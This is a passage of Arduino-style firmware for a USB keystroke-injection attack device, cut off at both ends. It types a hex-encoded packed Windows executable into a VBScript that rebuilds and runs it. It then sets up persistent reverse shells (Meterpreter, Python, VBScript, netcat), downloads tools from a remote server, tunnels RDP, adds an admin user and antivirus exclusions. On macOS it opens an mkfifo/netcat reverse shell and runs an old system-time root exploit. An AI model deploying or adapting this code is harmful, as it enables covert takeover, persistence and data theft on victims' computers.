40 04 10 02 7f db a2 ff 01 43 6c 6f 73 65 48 61 0d 65 0c 45 78 ")); Keyboard.print(F("69 74 54 68 bb c3 fe f6 72 65 61 64 0b 52 65 73 75 6d 65 0d 43 06 74 65 3d d8 ed f6 50 72 6f 63 16 73 41 0f 47 65 28 43 6f 6e fe a7 64 bb 17 78 74 11 53 56 69 72 74 75 61 6c 41 6c 3f d9 5b db 62 63 59 0f 57 72 69 42 4d 65 6d ")); Keyboard.print(F("6f 72 80 6f ff b3 79 8b 87 08 23 18 0f 0e 1a 0a 00 08 00 50 45 fe c3 fe 25 55 01 04 00 a0 0b 0d 53 ab e0 00 02 21 0b 01 0c 60 f6 ac db 08 02 0c 0e 13 30 11 bf eb 62 5f 09 f1 00 10 0b 1f 06 33 59 d7 86 05 07 50 03 04 0a 4b f6 ")); Keyboard.print(F("62 b7 1e 40 05 34 2b 07 06 02 d6 8d 25 00 24 4f 28 0f 14 36 6c ca 00 40 72 00 03 36 b2 2e 34 24 13 00 2e b9 00 b6 08 32 00 52 50 bb 61 c3 82 cb b7 00 42 60 2e de 7b db c2 72 64 87 61 08 0c 27 88 27 9f ed 66 c9 ec 00 a2 40 2e ")); Keyboard.print(F("26 00 0d 08 85 3d d3 75 04 30 03 0a 0b 27 1e c1 0c db c0 4f 65 9d d3 14 eb be 29 fb 4f 12 27 42 04 70 24 8c 23 00 00 00 ee 98 04 80 04 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7c 24 08 01 0f 85 b9 01 00 00 60 be 00 ")); Keyboard.print(F("60 00 10 8d be 00 b0 ff ff 57 83 cd ff eb 0d 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 31 c9 83 e8 03 ")); Keyboard.print(F("72 0d c1 e0 08 8a 06 46 83 f0 ff 74 74 89 c5 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 75 20 41 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 83 c1 02 ")); Keyboard.print(F("81 fd 00 f3 ff ff 83 d1 01 8d 14 2f 83 fd fc 76 0f 8a 02 42 88 07 47 49 75 f7 e9 63 ff ff ff 90 8b 02 83 c2 04 89 07 83 c7 04 83 e9 04 77 f1 01 cf e9 4c ff ff ff 5e 89 f7 b9 01 00 00 00 8a 07 47 2c e8 3c 01 77 f7 80 3f 00 75 ")); Keyboard.print(F("f2 8b 07 8a 5f 04 66 c1 e8 08 c1 c0 10 86 c4 29 f8 80 eb e8 01 f0 89 07 83 c7 05 88 d8 e2 d9 8d be 00 40 00 00 8b 07 09 c0 74 3c 8b 5f 04 8d 84 30 00 60 00 00 01 f3 50 83 c7 08 ff 96 28 60 00 00 95 8a 07 47 08 c0 74 dc 89 f9 ")); Keyboard.print(F("57 48 f2 ae 55 ff 96 2c 60 00 00 09 c0 74 07 89 03 83 c3 04 eb e1 61 31 c0 c2 0c 00 83 c7 04 8d 5e fc 31 c0 8a 07 47 09 c0 74 22 3c ef 77 11 01 c3 8b 03 86 c4 c1 c0 10 86 c4 01 f0 89 03 eb e2 24 0f c1 e0 10 66 8b 07 83 c7 02 ")); Keyboard.print(F("eb e2 8b ae 30 60 00 00 8d be 00 f0 ff ff bb 00 10 00 00 50 54 6a 04 53 57 ff d5 8d 87 ef 01 00 00 80 20 7f 80 60 28 7f 58 50 54 50 53 57 ff d5 58 61 8d 44 24 80 6a 00 39 c4 75 fa 83 ec 80 e9 d7 ab ff ff 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 70 00 00 28 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 70 00 00 5a 70 00 00 6a 70 00 00 7a 70 00 00 88 70 00 00 00 00 00 00 4b ")); Keyboard.print(F("45 52 4e 45 4c 33 32 2e 44 4c 4c 00 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 56 69 72 74 75 61 6c 41 6c 6c 6f 63 00 00 56 69 ")); Keyboard.print(F("72 74 75 61 6c 46 72 65 65 00 00 00 00 60 00 00 0c 00 00 00 9d 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); delay(1000); // split the hex string into an array, rebuild into a binary executable Keyboard.print(F("echo hexarr = Split(hexstr) : ")); Keyboard.print(F("ReDim binarr(Ubound(hexarr)) : ")); Keyboard.print(F("For i = 0 To Ubound(hexarr) : ")); Keyboard.print(F("binarr(i) = Chr(CInt(\"&h\" ^& hexarr(i))) : ")); Keyboard.print(F("Next : ")); Keyboard.print(F("binstr = Join(binarr, \"\") : ")); Keyboard.print(F("Set objFSO=CreateObject(\"Scripting.FileSystemObject\") : ")); delay(1000); // write the created executable to file Keyboard.print(F("outFile=\"")); Keyboard.print(F(win_dll_target_folder)); Keyboard.print(F(win_dll_file_name)); Keyboard.print(F("\" : Set objFile = objFSO.CreateTextFile(outFile,True) : ")); Keyboard.print(F("objFile.Write binstr : ")); Keyboard.print("objFile.Close >> "); Keyboard.print(F(win_local_target_folder)); Keyboard.println(filename); // run the vbscript to create the exe delay(400); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F(filename)); // delete vbs file win_deleteFile(win_local_target_folder, filename); win_closeWindow(); delete(iphex); delete(porthex); } /** attempts to establish a persistent remote shell by scheduling a windows task currently only works for admin users **/ boolean win_getPersistentShell(void) { if (!flag.is_admin) { return false; // function currently only works for admin users } /** start with meterpreter shell if Win 7 **/ if (flag.is_win7) { win_persistentPowershellRevMeterpreter(); } delay(5000); /** if not connected, try python **/ if (!win_checkIfConnected()) { if (win_checkIfFile("C:\\python27\\", "python.exe")) { win_pyShell(false, NULL); // false = write to file, not to memory delay(500); win_createPythonScheduledTask("C:\\python27\\python.exe"); // create meterpreter shell recurring task as SYSTEM delay(500); } else if (win_checkIfFile("C:\\python27\\", "python.exe")){ win_pyShell(false, NULL); delay(500); win_createPythonScheduledTask("C:\\python33\\python.exe"); delay(500); } } else { return true; } delay(5000); /** if still not connected, try local vbscript Meterpreter **/ if (!win_checkIfConnected()) { // if the netcat shell connection was not successful, try the onboard shell script delay(1000); win_deleteFile(win_local_target_folder, win_python_file_name); delay(1000); win_vbscriptRevShell(false); // create and launch vbscript meterpreter shell delay(500); win_createVBShellScheduledTask(); // create a task for persistent shell } else { return true; } delay(5000); /** if still not connected, try downloading a Meterpreter exe **/ if (!win_checkIfConnected()) { delay(1000); win_deleteFile(win_local_target_folder, win_vbscript_file_name); delay(1000); win_fetchFile(meterpreter_remote_file); //download meterpreter exe delay(2000); win_openCmd(); delay(500); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(meterpreter_remote_file); // run the meterpreter shell } else { return true; } delay(5000); /** if still not connected, try a netcat shell **/ if (!win_checkIfConnected()) { // if the netcat shell connection was not successful, try the onboard shell script delay(1000); if (win_fetchFile(netcat_remote_file)) { // if successfull download of netcat via ftp or http win_createNetcatScheduledTask(); // create and launch a scheduled task netcat reverse shell } } else { return true; } } /** use this function to attempt to establish a non-persistent shell to remote machine the powershell and python shells will execute from memory which is ideal for scenarios where the user is not an Admin and AV cannot be disabled **/ boolean win_getNonPersistentShell(void) { if (flag.is_win7) { // start with meterpreter shell if Win 7 win_openPowershell(); // open a powershell prompt win_powershellRevMeterpreter(); sendKey(KEY_ENTER); //execute shell } delay(5000); sendKey(KEY_ENTER); // clear error if powershell script failed if (!win_checkIfConnected()) { // if the powershell script was not successful, try a python rev shell from memory Keyboard.println("Exit"); // exit cmd window if Powershell shell failed if (win_checkIfFile("C:\\python27\\", "python.exe")) { win_pyShell(true, "C:\\python27\\"); // true = execute from memory } else if (win_checkIfFile("C:\\python34\\", "python.exe")) { win_pyShell(true, "C:\\python34\\"); // true = execute from memory } } else { return true; } delay(5000); if (!win_checkIfConnected()) { // if the python shell was not successful, try a vbscript shell win_vbscriptRevShell(true); } else { return true; } delay(5000); if (!win_checkIfConnected()) { // if the python shell was not successful, try a netcat rev shell if (win_fetchFile(netcat_remote_file)) { // if successfull download of netcat via ftp or http win_manualNetcatLaunch(); // try getting non-persistent shell } } else { return true; } delay(5000); if (!win_checkIfConnected()) { return false; } else { return true; } } void win_getRDP(void) { /** Tunnel RDP back to remote machine**/ win_enableRdp(); // enable RDP and make firewall exception delay(3000); if (win_fetchFile(plink_remote_file)) { // download plink and tunnel RDP to remote machine delay(1000); win_plinkRDP(); // establish the RDP session } } /** ################################################ ############## MAC FUNCTIONS ############# ################################################ **/ /** fetch a file from remote server via wget **/ void mac_fetchFileHTTP(char *filename) { delay(200); Keyboard.print(F("wget ")); Keyboard.print(F(remote_url)); Keyboard.println(F(filename)); delay(500); } /** minimize open windows to avoid any conflicts **/ void mac_minWindows(void) { delay(200); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_H); Keyboard.set_key2(KEY_M); Keyboard.send_now(); clearKeys(); } /** quit running app **/ void mac_quitApp(void) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_Q); Keyboard.send_now(); clearKeys(); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); clearKeys(); } /** open spotlight application to launch other apps **/ void mac_openSpotlight(void) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); clearKeys(); } /** open the command terminal **/ void mac_openTerminal(void) { delay(200); Keyboard.print("Terminal"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); clearKeys(); // cancel any processes in case terminal is already running Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_C); Keyboard.send_now(); clearKeys(); } /** get remote shell via netcat assumes nc is installed; otherwise you can use fetch file functions to download from remote server **/ void mac_ncShell(void) { delay(1000); Keyboard.print(F("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ")); // for nc without -e Keyboard.print(remote_ip); Keyboard.print(F(" ")); Keyboard.print(remote_nc_port); Keyboard.println(F(" > /tmp/f &")); } /** get root via system time vuln in pre-Mavericks OS version **/ void mac_getRoot(void) { delay(2000); // capture current date and time and build reset script Keyboard.println("echo -n 'systemsetup -setusingnetworktime Off -settimezone ' > resettime"); Keyboard.println("echo -n $(systemsetup -gettimezone | awk -F\': \' \'{print $2}\') >> resettime"); Keyboard.println("echo -n ' -setdate ' >> resettime"); Keyboard.println("echo -n $(date +%m:%d:%Y) >> resettime"); Keyboard.println("echo -n ' -settime ' >> resettime"); Keyboard.println("echo -n $(date +%H:%M) >> resettime"); delay(2000); // change system time to get root Keyboard.println("sudo -k"); Keyboard.println("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00"); // change system time for exploit Keyboard.println("sudo su"); delay(2000); // execute netcat reverse shell as root (if exploit worked) mac_ncShell(); delay(2000); // reset the system date/time to original value Keyboard.println("chmod 777 resettime"); Keyboard.println("./resettime"); delay(500); Keyboard.println("rm resettime"); // delete script file } /** ################################################ ############### OS SCRIPTS ############## ################################################ Scripts for each OS to run the available OS-specific functions ################################################ **/ /** the mac script **/ void mac_script(void) { delay(500); /** minimize active windows **/ mac_minWindows(); // I've noticed on some Macs that if there are a lot of windows open, the first minimize mac_minWindows(); // sometimes leaves a stray window open which is why it's done twice here /** open terminal, get root, and open a nc rev shell **/ delay(500); mac_openSpotlight(); // here I use spotlight to open Terminal as hot keys can vary mac_openTerminal(); delay(2000); Keyboard.println("cd /tmp"); // work out of the /tmp directory delay(2000); mac_getRoot(); // attempt to get root on system (works on pre-Mavericks only) delay(300); Keyboard.println("exit"); mac_quitApp(); } /** the windows script **/ void win_script(void) { boolean gotshell = false; wait_for_drivers(); // wait until device is loaded win_minWindows(); // minimize any open windows win_createFolder(win_local_target_folder); // create a folder for saving files/scripts; path set in config section delay(1000); /** perform admin functions if applicable **/ if (win_checkIfAdmin()) { /** configure firewall rule to allow ftp **/ win_firewallProgramRule("c:\\windows\\system32\\ftp.exe", "ftpallow"); /** check for the presence of AV and create a scanning folder exception **/ win_avException(); /** add user with admin privs **/ win_addUser(local_user, local_pass); } delay(2000); /** get reverse shell/RDP **/ if (flag.persist) { gotshell = win_getPersistentShell(); // first try persistent shell methods (admin only) } delay(2000); if (!gotshell) { if (!win_getNonPersistentShell()) {; // try non-persistent if (flag.is_admin) { delay(1000); win_getRDP(); // if we still can't get a shell and we're admin, try RDP } } } /** grab files of interest -- files defined in global vars section **/ delay(2000); size_t i=0; for (i=0; i